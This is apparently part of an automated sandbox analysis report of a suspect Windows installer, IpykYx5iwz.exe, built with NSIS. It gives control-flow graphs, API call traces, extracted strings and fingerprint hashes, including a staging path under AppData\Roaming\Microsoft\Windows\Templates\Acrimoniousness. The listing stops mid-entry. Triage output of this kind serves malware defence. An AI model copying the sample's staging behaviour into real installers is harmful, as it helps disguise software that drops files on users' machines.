                                                  control_flow_graph 290 40395e-403976 call 4064d9 293 403978-403988 call 40609f 290->293 294 40398a-4039bb call 406028 290->294 301 4039de-403a07 call 403c23 call 405bc7 293->301 299 4039d3-4039d9 lstrcatA 294->299 300 4039bd-4039ce call 406028 294->300 299->301 300->299 308 403a0d-403a12 301->308 309 403a8e-403a96 call 405bc7 301->309 308->309 310 403a14-403a38 call 406028 308->310 315 403aa4-403ac9 LoadImageA 309->315 316 403a98-403a9f call 406163 309->316 310->309 317 403a3a-403a3c 310->317 319 403b4a-403b52 call 40140b 315->319 320 403acb-403afb RegisterClassA 315->320 316->315 322 403a4d-403a59 lstrlenA 317->322 323 403a3e-403a4b call 405b04 317->323 332 403b54-403b57 319->332 333 403b5c-403b67 call 403c23 319->333 324 403b01-403b45 SystemParametersInfoA CreateWindowExA 320->324 325 403c19 320->325 329 403a81-403a89 call 405ad9 call 406141 322->329 330 403a5b-403a69 lstrcmpiA 322->330 323->322 324->319 328 403c1b-403c22 325->328 329->309 330->329 331 403a6b-403a75 GetFileAttributesA 330->331 336 403a77-403a79 331->336 337 403a7b-403a7c call 405b20 331->337 332->328 343 403bf0-403bf1 call 40533a 333->343 344 403b6d-403b87 ShowWindow call 40646b 333->344 336->329 336->337 337->329 347 403bf6-403bf8 343->347 351 403b93-403ba5 GetClassInfoA 344->351 352 403b89-403b8e call 40646b 344->352 349 403c12-403c14 call 40140b 347->349 350 403bfa-403c00 347->350 349->325 350->332 353 403c06-403c0d call 40140b 350->353 356 403ba7-403bb7 GetClassInfoA RegisterClassA 351->356 357 403bbd-403be0 DialogBoxParamA call 40140b 351->357 352->351 353->332 356->357 360 403be5-403bee call 4038ae 357->360 360->328
                                                  APIs
                                                    • Part of subcall function 004064D9: GetModuleHandleA.KERNEL32(?,?,?,004033F7,0000000A), ref: 004064EB
                                                    • Part of subcall function 004064D9: GetProcAddress.KERNEL32(00000000,?), ref: 00406506
                                                  • lstrcatA.KERNEL32(1033,helsidesannoncen: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,helsidesannoncen: Installing,00000000,00000002,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IpykYx5iwz.exe",00000000), ref: 004039D9
                                                  • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness,1033,helsidesannoncen: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,helsidesannoncen: Installing,00000000,00000002,74DF3410), ref: 00403A4E
                                                  • lstrcmpiA.KERNEL32(?,.exe), ref: 00403A61
                                                  • GetFileAttributesA.KERNEL32(Call), ref: 00403A6C
                                                  • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness), ref: 00403AB5
                                                    • Part of subcall function 0040609F: wsprintfA.USER32 ref: 004060AC
                                                  • RegisterClassA.USER32(00423EC0), ref: 00403AF2
                                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403B0A
                                                  • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B3F
                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403B75
                                                  • GetClassInfoA.USER32(00000000,RichEdit20A,00423EC0), ref: 00403BA1
                                                  • GetClassInfoA.USER32(00000000,RichEdit,00423EC0), ref: 00403BAE
                                                  • RegisterClassA.USER32(00423EC0), ref: 00403BB7
                                                  • DialogBoxParamA.USER32(?,00000000,00403CFB,00000000), ref: 00403BD6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: "C:\Users\user\Desktop\IpykYx5iwz.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$helsidesannoncen: Installing
                                                  • API String ID: 1975747703-2070757090
                                                  • Opcode ID: 6b4fe61fd8b1bc1d6988934ffc3da0af0016106810d9f066b8e32a87dcf9b062
                                                  • Instruction ID: b29c60b9e4819681180a0682236be2a56282820a6c44356677c11e3a39c8f367
                                                  • Opcode Fuzzy Hash: 6b4fe61fd8b1bc1d6988934ffc3da0af0016106810d9f066b8e32a87dcf9b062
                                                  • Instruction Fuzzy Hash: 0961D8707406046ED620AF65AD45F273EACDB8574AF40043FF951B22E2CB7D9D068A3D

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 364 402e14-402e62 GetTickCount GetModuleFileNameA call 405cda 367 402e64-402e69 364->367 368 402e6e-402e9c call 406141 call 405b20 call 406141 GetFileSize 364->368 369 4030ae-4030b2 367->369 376 402ea2 368->376 377 402f87-402f95 call 402d75 368->377 379 402ea7-402ebe 376->379 383 403066-40306b 377->383 384 402f9b-402f9e 377->384 381 402ec0 379->381 382 402ec2-402ecb call 403326 379->382 381->382 390 402ed1-402ed8 382->390 391 403022-40302a call 402d75 382->391 383->369 386 402fa0-402fb8 call 40333c call 403326 384->386 387 402fca-403016 GlobalAlloc call 4065fe call 405d09 CreateFileA 384->387 386->383 415 402fbe-402fc4 386->415 412 403018-40301d 387->412 413 40302c-40305c call 40333c call 4030b5 387->413 396 402f54-402f58 390->396 397 402eda-402eee call 405c95 390->397 391->383 401 402f62-402f68 396->401 402 402f5a-402f61 call 402d75 396->402 397->401 411 402ef0-402ef7 397->411 408 402f77-402f7f 401->408 409 402f6a-402f74 call 406590 401->409 402->401 408->379 414 402f85 408->414 409->408 411->401 418 402ef9-402f00 411->418 412->369 425 403061-403064 413->425 414->377 415->383 415->387 418->401 420 402f02-402f09 418->420 420->401 422 402f0b-402f12 420->422 422->401 424 402f14-402f34 422->424 424->383 426 402f3a-402f3e 424->426 425->383 427 40306d-40307e 425->427 428 402f40-402f44 426->428 429 402f46-402f4e 426->429 430 403080 427->430 431 403086-40308b 427->431 428->414 428->429 429->401 433 402f50-402f52 429->433 430->431 432 40308c-403092 431->432 432->432 434 403094-4030ac call 405c95 432->434 433->401 434->369
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00402E28
                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\IpykYx5iwz.exe,00000400), ref: 00402E44
                                                    • Part of subcall function 00405CDA: GetFileAttributesA.KERNELBASE(00000003,00402E57,C:\Users\user\Desktop\IpykYx5iwz.exe,80000000,00000003), ref: 00405CDE
                                                    • Part of subcall function 00405CDA: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D00
                                                  • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\IpykYx5iwz.exe,C:\Users\user\Desktop\IpykYx5iwz.exe,80000000,00000003), ref: 00402E8D
                                                  • GlobalAlloc.KERNELBASE(00000040,0040A130), ref: 00402FCF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                  • String ID: "C:\Users\user\Desktop\IpykYx5iwz.exe"$@`$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\IpykYx5iwz.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                  • API String ID: 2803837635-1674753314
                                                  • Opcode ID: 4ff25efca784e1cc9ed499d867bd0cc09cb833d32a8a78639c2c43bbf880cacd
                                                  • Instruction ID: 15cfe338c172b2f14672f474af97282dc626767e8c2a942c813fbe846372f848
                                                  • Opcode Fuzzy Hash: 4ff25efca784e1cc9ed499d867bd0cc09cb833d32a8a78639c2c43bbf880cacd
                                                  • Instruction Fuzzy Hash: C271B271A00208ABDB20EF74ED89BAE7BB8EB44355F51403BE910B62D1D77C9E418B5C

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 437 406163-40616e 438 406170-40617f 437->438 439 406181-406197 437->439 438->439 440 406388-40638c 439->440 441 40619d-4061a8 439->441 442 406392-40639c 440->442 443 4061ba-4061c4 440->443 441->440 444 4061ae-4061b5 441->444 445 4063a7-4063a8 442->445 446 40639e-4063a2 call 406141 442->446 443->442 447 4061ca-4061d1 443->447 444->440 446->445 449 4061d7-40620b 447->449 450 40637b 447->450 451 406211-40621b 449->451 452 406328-40632b 449->452 453 406385-406387 450->453 454 40637d-406383 450->454 457 406235 451->457 458 40621d-406221 451->458 455 40635b-40635e 452->455 456 40632d-406330 452->456 453->440 454->440 462 406360-406367 call 406163 455->462 463 40636c-406379 lstrlenA 455->463 459 406340-40634c call 406141 456->459 460 406332-40633e call 40609f 456->460 461 40623c-406243 457->461 458->457 464 406223-406227 458->464 475 406351-406357 459->475 460->475 467 406245-406247 461->467 468 406248-40624a 461->468 462->463 463->440 464->457 465 406229-40622d 464->465 465->457 471 40622f-406233 465->471 467->468 473 406283-406286 468->473 474 40624c-406267 call 406028 468->474 471->461 478 406296-406299 473->478 479 406288-406294 GetSystemDirectoryA 473->479 480 40626c-40626f 474->480 475->463 477 406359 475->477 481 406320-406326 call 4063ab 477->481 483 406306-406308 478->483 484 40629b-4062a9 GetWindowsDirectoryA 478->484 482 40630a-40630d 479->482 485 406275-40627e call 406163 480->485 486 40630f-406313 480->486 481->463 482->481 482->486 483->482 487 4062ab-4062b5 483->487 484->483 485->482 486->481 492 406315-40631b lstrcatA 486->492 489 4062b7-4062ba 487->489 490 4062cf-4062e5 SHGetSpecialFolderLocation 487->490 489->490 494 4062bc-4062c3 489->494 495 406303 490->495 496 4062e7-406301 SHGetPathFromIDListA CoTaskMemFree 490->496 492->481 498 4062cb-4062cd 494->498 495->483 496->482 496->495 498->482 498->490
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 0040628E
                                                  • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00000000,004052A0,Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00000000), ref: 004062A1
                                                  • SHGetSpecialFolderLocation.SHELL32(004052A0,00000000,?,Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00000000,004052A0,Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00000000), ref: 004062DD
                                                  • SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 004062EB
                                                  • CoTaskMemFree.OLE32(00000000), ref: 004062F7
                                                  • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040631B
                                                  • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00000000,004052A0,Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00000000,00000000,00000000,00000000), ref: 0040636D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                  • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$r%[
                                                  • API String ID: 717251189-1455032328
                                                  • Opcode ID: bc87b3e97bb764acd918afca442ef092ef133b7939c8ef98f3bffe60c9072dc7
                                                  • Instruction ID: 216e8927814ca7a9437579cdf690648b6b4dd304440a75ce87bcc4b513c9caea
                                                  • Opcode Fuzzy Hash: bc87b3e97bb764acd918afca442ef092ef133b7939c8ef98f3bffe60c9072dc7
                                                  • Instruction Fuzzy Hash: B661F431900215AEDF209F24D8917BE3BA4AB46314F52413FED53B62D1C73C4966CB8E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 568 401759-40177c call 402b2c call 405b46 573 401786-401798 call 406141 call 405ad9 lstrcatA 568->573 574 40177e-401784 call 406141 568->574 579 40179d-4017a3 call 4063ab 573->579 574->579 584 4017a8-4017ac 579->584 585 4017ae-4017b8 call 406444 584->585 586 4017df-4017e2 584->586 593 4017ca-4017dc 585->593 594 4017ba-4017c8 CompareFileTime 585->594 587 4017e4-4017e5 call 405cb5 586->587 588 4017ea-401806 call 405cda 586->588 587->588 596 401808-40180b 588->596 597 40187e-4018a7 call 405268 call 4030b5 588->597 593->586 594->593 598 401860-40186a call 405268 596->598 599 40180d-40184f call 406141 * 2 call 406163 call 406141 call 40585d 596->599 609 4018a9-4018ad 597->609 610 4018af-4018bb SetFileTime 597->610 611 401873-401879 598->611 599->584 631 401855-401856 599->631 609->610 613 4018c1-4018cc CloseHandle 609->613 610->613 614 4029c1 611->614 616 4018d2-4018d5 613->616 617 4029b8-4029bb 613->617 618 4029c3-4029c7 614->618 621 4018d7-4018e8 call 406163 lstrcatA 616->621 622 4018ea-4018ed call 406163 616->622 617->614 628 4018f2-402353 call 40585d 621->628 622->628 628->617 628->618 631->611 633 401858-401859 631->633 633->598
                                                  APIs
                                                  • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness,00000000,00000000,00000031), ref: 00401798
                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness,00000000,00000000,00000031), ref: 004017C2
                                                    • Part of subcall function 00406141: lstrcpynA.KERNEL32(?,?,00000400,00403456,00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 0040614E
                                                    • Part of subcall function 00405268: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000,?), ref: 004052A1
                                                    • Part of subcall function 00405268: lstrlenA.KERNEL32(00402DEC,Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000), ref: 004052B1
                                                    • Part of subcall function 00405268: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00402DEC,00402DEC,Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00000000,00000000,00000000), ref: 004052C4
                                                    • Part of subcall function 00405268: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll), ref: 004052D6
                                                    • Part of subcall function 00405268: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052FC
                                                    • Part of subcall function 00405268: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405316
                                                    • Part of subcall function 00405268: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405324
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp$C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness$Call
                                                  • API String ID: 1941528284-1398721898
                                                  • Opcode ID: 3977d18ed3adfd87aea9d22c3e155ed73dce7875c8c0f0fc94715b3dcf40bbd7
                                                  • Instruction ID: 0d7b692f0969cc6c48ecd1773d7bef120b43cce909374c5328822aabc6167b55
                                                  • Opcode Fuzzy Hash: 3977d18ed3adfd87aea9d22c3e155ed73dce7875c8c0f0fc94715b3dcf40bbd7
                                                  • Instruction Fuzzy Hash: 5041EA31904514BACF107FB5CC85DAF3675DF01368B21823BF422F11E2D67C8A518A6D

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 635 405268-40527d 636 405333-405337 635->636 637 405283-405295 635->637 638 4052a0-4052ac lstrlenA 637->638 639 405297-40529b call 406163 637->639 641 4052c9-4052cd 638->641 642 4052ae-4052be lstrlenA 638->642 639->638 643 4052dc-4052e0 641->643 644 4052cf-4052d6 SetWindowTextA 641->644 642->636 645 4052c0-4052c4 lstrcatA 642->645 646 4052e2-405324 SendMessageA * 3 643->646 647 405326-405328 643->647 644->643 645->641 646->647 647->636 648 40532a-40532d 647->648 648->636
                                                  APIs
                                                  • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000,?), ref: 004052A1
                                                  • lstrlenA.KERNEL32(00402DEC,Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000), ref: 004052B1
                                                  • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00402DEC,00402DEC,Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00000000,00000000,00000000), ref: 004052C4
                                                  • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll), ref: 004052D6
                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052FC
                                                  • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405316
                                                  • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405324
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                  • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll
                                                  • API String ID: 2531174081-1287030649
                                                  • Opcode ID: 2f96d13f7099a24f0d018df83f359bf90dc184b4bf3a12aab0b4e7de8e6cc458
                                                  • Instruction ID: 33e4e25cccf7abea72a497d718f2df9cdca22d62bd402c63bdf8694765fb3fc0
                                                  • Opcode Fuzzy Hash: 2f96d13f7099a24f0d018df83f359bf90dc184b4bf3a12aab0b4e7de8e6cc458
                                                  • Instruction Fuzzy Hash: 7A219A71900508BACB119FA5DD81A9EBFB9EF04354F00807AF944B6291C7B98A80CFA8

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 649 402d75-402d81 650 402d83-402d8a 649->650 651 402d9b-402da1 649->651 652 402d93-402d99 650->652 653 402d8c-402d8d DestroyWindow 650->653 654 402da3-402da9 call 406515 651->654 655 402dab-402db7 GetTickCount 651->655 656 402e11-402e13 652->656 653->652 654->656 655->656 658 402db9-402dbf 655->658 660 402dc1-402dc8 658->660 661 402dee-402e0b CreateDialogParamA ShowWindow 658->661 660->656 662 402dca-402de7 call 402d59 wsprintfA call 405268 660->662 661->656 666 402dec 662->666 666->656
                                                  APIs
                                                  • DestroyWindow.USER32(00000000,00000000), ref: 00402D8D
                                                  • GetTickCount.KERNEL32 ref: 00402DAB
                                                  • wsprintfA.USER32 ref: 00402DD9
                                                    • Part of subcall function 00405268: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000,?), ref: 004052A1
                                                    • Part of subcall function 00405268: lstrlenA.KERNEL32(00402DEC,Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000), ref: 004052B1
                                                    • Part of subcall function 00405268: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00402DEC,00402DEC,Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00000000,00000000,00000000), ref: 004052C4
                                                    • Part of subcall function 00405268: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll), ref: 004052D6
                                                    • Part of subcall function 00405268: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052FC
                                                    • Part of subcall function 00405268: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405316
                                                    • Part of subcall function 00405268: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405324
                                                  • CreateDialogParamA.USER32(0000006F,00000000,00402CDD,00000000), ref: 00402DFD
                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402E0B
                                                    • Part of subcall function 00402D59: MulDiv.KERNEL32(00094DBA,00000064,00096040), ref: 00402D6E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                  • String ID: ... %d%%
                                                  • API String ID: 722711167-2449383134
                                                  • Opcode ID: 287a87dfb5e4d78576b7e5b64b45a7e89b2ba7f01569e9835e7ddccb831194a9
                                                  • Instruction ID: b553f58f662a8d3b5c132dd9eb473e82ace801a4c3d7fb7af48dab40205e53c4
                                                  • Opcode Fuzzy Hash: 287a87dfb5e4d78576b7e5b64b45a7e89b2ba7f01569e9835e7ddccb831194a9
                                                  • Instruction Fuzzy Hash: EC01C430501624EBCB21AB60EF0CEDE77A8EB80705B04013BF905B51E1DBB848568AED

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 667 40572e-405779 CreateDirectoryA 668 40577b-40577d 667->668 669 40577f-40578c GetLastError 667->669 670 4057a6-4057a8 668->670 669->670 671 40578e-4057a2 SetFileSecurityA 669->671 671->668 672 4057a4 GetLastError 671->672 672->670
                                                  APIs
                                                  • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405771
